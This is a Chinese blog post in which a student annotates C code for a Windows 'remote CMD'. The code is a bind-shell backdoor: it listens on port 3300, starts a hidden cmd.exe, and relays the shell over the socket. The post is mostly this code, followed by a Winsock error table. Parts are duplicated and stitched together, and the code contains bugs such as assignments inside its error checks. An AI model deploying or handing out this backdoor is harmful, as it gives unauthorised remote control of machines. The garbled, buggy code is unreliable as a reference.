利用匿名管道实现远程CMD---我的解读
来源:互联网 发布:百度网站怎么优化 编辑:程序博客网 时间:2024/05/22 00:36
// vctelnetserver.cpp : Defines the entry point for the console application.
//这是从网上找的代码,相当于从解读代码的角度来分析这个“利用匿名管道实现的远程CMD”来学习我们这周的内容咯
//也算是半个晚上的成果,牛掰大神们不要笑话某渣
//by 司空徵
#include "stdio.h"
#include <Winsock2.h>
#include <Windows.h>
#include <Winbase.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
void main()
{
WSADATA zi;//该结构被用来储存调用AfxSocketInit全局函数返回的Windows Sockets初始化信息。
SOCKET telnetan;//TCP协议什么的telnet命令有关?!╮(╯_╰)╭
int pcport = 3300;
int ret;
if ((ret = WSAStartup(MAKEWORD(2,2),&zi)) != 0)//初始化差错报错系列
//windows初始化socket网络库申请2.2版本,从而使得高版本的Winsock可以使用
//winsock基础 如下
//http://wenku.baidu.com/link?url=Rvhc48n-iTPvXyndf2V-AyHd6pK39_H4ZQf8qlOd1Fkrb4NOmKC0Irf7uM6lXMDLM6iHsiP68-AVJiIrWHYNL4i5O3zDNNqdqKNfpo8hpbi
//这是从网上找的代码,相当于从解读代码的角度来分析这个“利用匿名管道实现的远程CMD”来学习我们这周的内容咯
//也算是半个晚上的成果,牛掰大神们不要笑话某渣
//by 司空徵
#include "stdio.h"
#include <Winsock2.h>
#include <Windows.h>
#include <Winbase.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
void main()
{
WSADATA zi;//该结构被用来储存调用AfxSocketInit全局函数返回的Windows Sockets初始化信息。
SOCKET telnetan;//TCP协议什么的telnet命令有关?!╮(╯_╰)╭
int pcport = 3300;
int ret;
if ((ret = WSAStartup(MAKEWORD(2,2),&zi)) != 0)//初始化差错报错系列
//windows初始化socket网络库申请2.2版本,从而使得高版本的Winsock可以使用
//winsock基础 如下
//http://wenku.baidu.com/link?url=Rvhc48n-iTPvXyndf2V-AyHd6pK39_H4ZQf8qlOd1Fkrb4NOmKC0Irf7uM6lXMDLM6iHsiP68-AVJiIrWHYNL4i5O3zDNNqdqKNfpo8hpbi
{
printf("WSAStartup failed with error %d\n", ret);
return;
}
if ((telnetan = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)//如果socket被设置成无效套接字
{
printf("socket failed with error %d\n", WSAGetLastError());//从而使得高版本的Winsock可以使用
WSACleanup();
return;
}
SOCKADDR_IN telnet_server;
//sockaddr_in和sockaddr是并列的结构,指向sockaddr_in的结构体的指针也可以指向
//sockaddr的结构体,并代替它。也就是说,你可以使用sockaddr_in建立你所需要的信息,
telnet_server.sin_family = AF_INET;//Address family 一般来说 AF_INET(地址族)PF_INET(协议族 )
telnet_server.sin_port = htons(pcport);//Port number (必须要采用网络数据格式,普通数字可以用htons()函数转换成网络数据格式的数字)
telnet_server.sin_addr.s_addr = htonl(INADDR_ANY);// Internet address
if (bind(telnetan, (SOCKADDR *)&telnet_server, sizeof(telnet_server))== SOCKET_ERROR)
//bind()——将本端sockaddr_in(赋值后)强制转换成sockaddr 类型,绑定到socket 句柄上
{
printf("bind failed with error %d\n", WSAGetLastError());
closesocket(telnetan);
WSACleanup();
return;
}
if (listen(telnetan, 5) == SOCKET_ERROR)//末尾处有socket error一览表。。。原谅我的储物癖~\(≧▽≦)/~
{
printf("listen failed with error %d\n", WSAGetLastError());
closesocket(telnetan);
WSACleanup();
return;
}
int telnetsize=sizeof(telnet_server);
SOCKET clientaccept;
while (true)
{
if((clientaccept = accept(telnetan, (SOCKADDR *) &telnet_server,&telnetsize)) != INVALID_SOCKET)
{
//建立匿名管道
SECURITY_ATTRIBUTES pipeline1,pipeline2;
HANDLE hReadPipe,hWritePipe,hWriteFile,hReadFile;
pipeline1.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeline1.lpSecurityDescriptor = NULL;
pipeline1.bInheritHandle = true;
if((ret = CreatePipe(&hReadPipe,&hWriteFile,&pipeline1,0)) = 0)
{
printf("建立cmd管道失败! ::d%",GetLastError());
WSACleanup();
}
pipeline2.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeline2.lpSecurityDescriptor = NULL;
pipeline2.bInheritHandle = true;
if((ret = CreatePipe(&hReadFile,&hWritePipe,&pipeline2,0)) = 0)
{
printf("建立cmd管道失败! ::d%",GetLastError());
WSACleanup();
}
//进程结构体 CMD来啦~(~o ̄▽ ̄)~o ~。。。
STARTUPINFO cmdpos;
ZeroMemory(&cmdpos,sizeof(cmdpos));//将结构体里的所有成员初始值置为0
GetStartupInfo(&cmdpos);
cmdpos.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
cmdpos.wShowWindow = SW_HIDE;
cmdpos.hStdInput = hReadPipe;
cmdpos.hStdOutput = hWritePipe;
cmdpos.hStdError = hWritePipe;
PROCESS_INFORMATION processinformation;
//正式建立进程
char szAPP[256];
char recv_buff[1024];
char send_buff[1024];
DWORD nByteToWrite, nByteWritten,len;//至此 分享一个06的人写的“编程实现远程Shell的获取”
//http://hi.baidu.com/olhack/item/76aa411487891e0b8fbde40e
GetSystemDirectory(szAPP,MAX_PATH+1);
strcat(szAPP,"\\cmd.exe");
ret=CreateProcess(NULL,szAPP,NULL,NULL,1,0,NULL,NULL,&cmdpos,&processinformation);
//WIN32API函数CreateProcess用来创建一个新的进程和它的主线程,这个新进程运行指定的可执行文件
while(true)
{
ReadFile(hReadFile,send_buff,1024,&len,NULL);
send(clientaccept,send_buff,len,0);
printf("%s",send_buff);
Sleep(1);
nByteToWrite = recv(clientaccept,recv_buff,1024,0);
WriteFile(hWriteFile,recv_buff,nByteToWrite,&nByteWritten,NULL);
Sleep(1);
}
}
}
}
/*************************************socket错误一览***********************************************
Socket error 0 - Directly send error
Socket error 10004 - Interrupted function call
Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address
Socket error 10022 - Invalid argument
Socket error 10024 - Too many open files
Socket error 10035 - Resource temporarily unavailable
Socket error 10036 - Operation now in progress
Socket error 10037 - Operation already in progress
Socket error 10038 - Socket operation on non-socket
Socket error 10039 - Destination address required
Socket error 10040 - Message too long
Socket error 10041 - Protocol wrong type for socket
Socket error 10042 - Bad protocol option
Socket error 10043 - Protocol not supported
Socket error 10044 - Socket type not supported
Socket error 10045 - Operation not supported
Socket error 10046 - Protocol family not supported
Socket error 10047 - Address family not supported by protocol family
Socket error 10048 - Address already in use
Socket error 10049 - Cannot assign requested address
Socket error 10050 - Network is down
Socket error 10051 - Network is unreachable
Socket error 10052 - Network dropped connection on reset
Socket error 10053 - Software caused connection abort
Socket error 10054 - Connection reset by peer
Socket error 10055 - No buffer space available
Socket error 10056 - Socket is already connected
Socket error 10057 - Socket is not connected
Socket error 10058 - Cannot send after socket shutdown
Socket error 10060 - Connection timed out
Socket error 10061 - Connection refused
Socket error 10064 - Host is down
Socket error 10065 - No route to host
Socket error 10067 - Too many processes
Socket error 10091 - Network subsystem is unavailable
Socket error 10092 - WINSOCK.DLL version out of range
Socket error 10093 - Successful WSAStartup not yet performed
Socket error 10094 - Graceful shutdown in progress
Socket error 11001 - Host not found
Socket error 11002 - Non-authoritative host not found
Socket error 11003 - This is a non-recoverable error
Socket error 11004 - Valid name, no data record of requested type
WSAEADDRINUSE (10048) Address already in use
WSAECONNABORTED (10053) Software caused connection abort
WSAECONNREFUSED (10061) Connection refused
WSAECONNRESET (10054) Connection reset by peer
WSAEDESTADDRREQ (10039) Destination address required
WSAEHOSTUNREACH (10065) No route to host
WSAEMFILE (10024) Too many open files
WSAENETDOWN (10050) Network is down
WSAENETRESET (10052) Network dropped connection
WSAENOBUFS (10055) No buffer space available
WSAENETUNREACH (10051) Network is unreachable
WSAETIMEDOUT (10060) Connection timed out
WSAHOST_NOT_FOUND (11001) Host not found
WSASYSNOTREADY (10091) Network sub-system is unavailable
WSANOTINITIALISED (10093) WSAStartup() not performed
WSANO_DATA (11004) Valid name, no data of that type
WSANO_RECOVERY (11003) Non-recoverable query error
WSATRY_AGAIN (11002) Non-authoritative host found
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version
************************************socket错误一览***********************************************/
}
}
}
/*************************************socket错误一览***********************************************
Socket error 0 - Directly send error
Socket error 10004 - Interrupted function call
Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address
Socket error 10022 - Invalid argument
Socket error 10024 - Too many open files
Socket error 10035 - Resource temporarily unavailable
Socket error 10036 - Operation now in progress
Socket error 10037 - Operation already in progress
Socket error 10038 - Socket operation on non-socket
Socket error 10039 - Destination address required
Socket error 10040 - Message too long
Socket error 10041 - Protocol wrong type for socket
Socket error 10042 - Bad protocol option
Socket error 10043 - Protocol not supported
Socket error 10044 - Socket type not supported
Socket error 10045 - Operation not supported
Socket error 10046 - Protocol family not supported
Socket error 10047 - Address family not supported by protocol family
Socket error 10048 - Address already in use
Socket error 10049 - Cannot assign requested address
Socket error 10050 - Network is down
Socket error 10051 - Network is unreachable
Socket error 10052 - Network dropped connection on reset
Socket error 10053 - Software caused connection abort
Socket error 10054 - Connection reset by peer
Socket error 10055 - No buffer space available
Socket error 10056 - Socket is already connected
Socket error 10057 - Socket is not connected
Socket error 10058 - Cannot send after socket shutdown
Socket error 10060 - Connection timed out
Socket error 10061 - Connection refused
Socket error 10064 - Host is down
Socket error 10065 - No route to host
Socket error 10067 - Too many processes
Socket error 10091 - Network subsystem is unavailable
Socket error 10092 - WINSOCK.DLL version out of range
Socket error 10093 - Successful WSAStartup not yet performed
Socket error 10094 - Graceful shutdown in progress
Socket error 11001 - Host not found
Socket error 11002 - Non-authoritative host not found
Socket error 11003 - This is a non-recoverable error
Socket error 11004 - Valid name, no data record of requested type
WSAEADDRINUSE (10048) Address already in use
WSAECONNABORTED (10053) Software caused connection abort
WSAECONNREFUSED (10061) Connection refused
WSAECONNRESET (10054) Connection reset by peer
WSAEDESTADDRREQ (10039) Destination address required
WSAEHOSTUNREACH (10065) No route to host
WSAEMFILE (10024) Too many open files
WSAENETDOWN (10050) Network is down
WSAENETRESET (10052) Network dropped connection
WSAENOBUFS (10055) No buffer space available
WSAENETUNREACH (10051) Network is unreachable
WSAETIMEDOUT (10060) Connection timed out
WSAHOST_NOT_FOUND (11001) Host not found
WSASYSNOTREADY (10091) Network sub-system is unavailable
WSANOTINITIALISED (10093) WSAStartup() not performed
WSANO_DATA (11004) Valid name, no data of that type
WSANO_RECOVERY (11003) Non-recoverable query error
WSATRY_AGAIN (11002) Non-authoritative host found
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version
************************************socket错误一览***********************************************/
0 0
- 利用匿名管道实现远程CMD---我的解读
- 利用匿名管道实现远程CMD
- 利用匿名管道实现远程CMD
- 利用匿名管道实现远程CMD(转)
- 利用匿名管道实现远程CMD(转)
- 利用匿名管道实现远程调用CMD
- 利用匿名管道实现远程CMD - ToBeroOTer的专栏 - CSDNBlog
- 利用匿名管道实现CMD回显
- 从利用匿名管道实现可交互式远程超级终端cmd.exe说起
- 匿名管道实现基于Socket的简单cmd后门
- linux 匿名、命名管道的实现
- Pipe,利用匿名管道实现进程间通信
- 利用匿名管道技术实现本地进程通信
- vc 利用无名管道 控制台程序实现cmd功能
- 匿名管道 c++实现
- 【匿名管道】重定向cmd.exe
- 实现CMD 管道源码
- 匿名管道的使用
- Oracle多表插入insert all/insert first的区别
- Excel 2010高级应用-折线图(二)
- Html的简单用法
- crontab 每分钟、每小时、每天、每周、每月、每年定时执行
- TextView水平剧中
- 利用匿名管道实现远程CMD---我的解读
- 模拟自动售货机C程序
- pthread_cancel 线程取消以及锁的释放
- smarty局部禁止缓存机制
- 获取手机短信内容
- 【我所认知的BIOS】—> uEFI AHCI Driver(2) — 原来开始也不那么简单
- java数据类型与运算符
- POJ 2446 Chessboard
- 初识云计算day025